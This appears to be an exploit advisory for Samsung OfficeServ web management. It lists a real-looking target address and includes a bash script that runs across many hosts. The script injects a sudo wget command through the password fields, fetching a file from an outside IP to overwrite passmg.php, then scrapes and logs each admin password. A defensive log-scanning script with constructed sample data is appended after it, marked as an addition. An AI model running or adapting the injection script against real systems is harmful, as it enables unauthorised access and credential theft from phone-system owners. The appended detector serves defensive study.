# Title: Samsung OfficeServ - Read the users/passwords
# Author: MaDo Mokhtar
# Contact: codezeroooo[at]yahoo[dot]com
# Vendor: http://www.samsung.com
# Version: Web Management V 4.12th 2010.04
- Introduction:
This converged communication system provides voice, data, wireline, and wireless solutions.
Combining its expertise in wireless, communications, core networks, digital technology and IP functionality, Samsung brings you the OfficeServ converged communication system. As a completely converged platform, OfficeServ supports both voice and data communication with powerful, IP-based wired and wireless flexibility.
- Vulnerability Explanation:
Some coders are so stupid. They save the usernames and passwords
in text files, UNPROTECTED.
- Vulnerable Code Snippet at /contents/general/passwd/passmg.php
- Proof of Concept:
https://201.192.234.66/contents/general/passwd/passmg.php
https://[ip]/contents/general/passwd/passmg.php
Bash script to grep the password
=====================
#! /bin/bash
filecon=(` cat $1 `)
for ip in "${filecon[@]}"
do
echo $ip
curl -m3 --insecure --data "sSMELoginID=admin&action=save&passwd1=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php&passwd2=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php" https://${ip}/login/myinfo.php >> tmp.tmp
res=$(curl -m3 --insecure https://${ip}/contents/general/passwd/passmg.php | grep old_passwd_0 | cut -d'"' -f6)
echo $res
echo "found: "${ip}" >> admin <> "$res" <<" >> foserv.res
done
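
A defensive counterpart to the script above, as an added example that is not part of the original advisory: it scans proxy logs for fetches of the password page and for password-change POSTs to /login/myinfo.php whose passwd1/passwd2 fields decode to shell metacharacters. The tab-separated log format, the sample lines, the management-station address and the function names are constructed assumptions.

```shell
#!/bin/sh
# Constructed sample log: src_ip <TAB> method <TAB> path <TAB> request body ("-" if none).
sample_log() {
  printf '%s\t%s\t%s\t%s\n' \
    10.0.0.5 GET /contents/general/passwd/passmg.php - \
    198.51.100.7 POST /login/myinfo.php 'sSMELoginID=admin&action=save&passwd1=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F203.0.113.9%2Fx&passwd2=any' \
    198.51.100.7 GET /contents/general/passwd/passmg.php - \
    10.0.0.5 POST /login/myinfo.php 'sSMELoginID=admin&action=save&passwd1=N3w%2BPass%21&passwd2=N3w%2BPass%21'
}

# $1 = the one management station expected to open the password page (assumption).
scan_officeserv_log() {
  awk -F '\t' -v admin="$1" '
    # Decode "+" and %XX so encoded metacharacters cannot hide from the match below.
    function urldecode(s,   out, i, n, c, hi, lo) {
      gsub(/\+/, " ", s); out = ""; n = length(s)
      for (i = 1; i <= n; i++) {
        c = substr(s, i, 1)
        if (c == "%" && i + 2 <= n) {
          hi = index(HEX, tolower(substr(s, i + 1, 1)))
          lo = index(HEX, tolower(substr(s, i + 2, 1)))
          if (hi && lo) { out = out sprintf("%c", (hi - 1) * 16 + lo - 1); i += 2; continue }
        }
        out = out c
      }
      return out
    }
    BEGIN { HEX = "0123456789abcdef" }
    # Password page fetched by anything other than the management station.
    $3 == "/contents/general/passwd/passmg.php" && $1 != admin { print "CRED_PAGE", $1 }
    # Password-change POST: inspect each password field after decoding.
    $2 == "POST" && $3 == "/login/myinfo.php" {
      n = split($4, kv, "&")
      for (i = 1; i <= n; i++) {
        eq = index(kv[i], "=")
        key = substr(kv[i], 1, eq - 1)
        val = urldecode(substr(kv[i], eq + 1))
        if (key ~ /^passwd[12]$/ && val ~ /&&|[;|`]|\$\(/) { print "CMD_INJECTION", $1, key; break }
      }
    }'
}

sample_log | scan_officeserv_log 10.0.0.5
```

A password that legitimately contains `;` or `|` will also be flagged, so treat CMD_INJECTION hits as leads to review alongside any CRED_PAGE hit from the same source.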
- Credits:
MaDo Mokhtar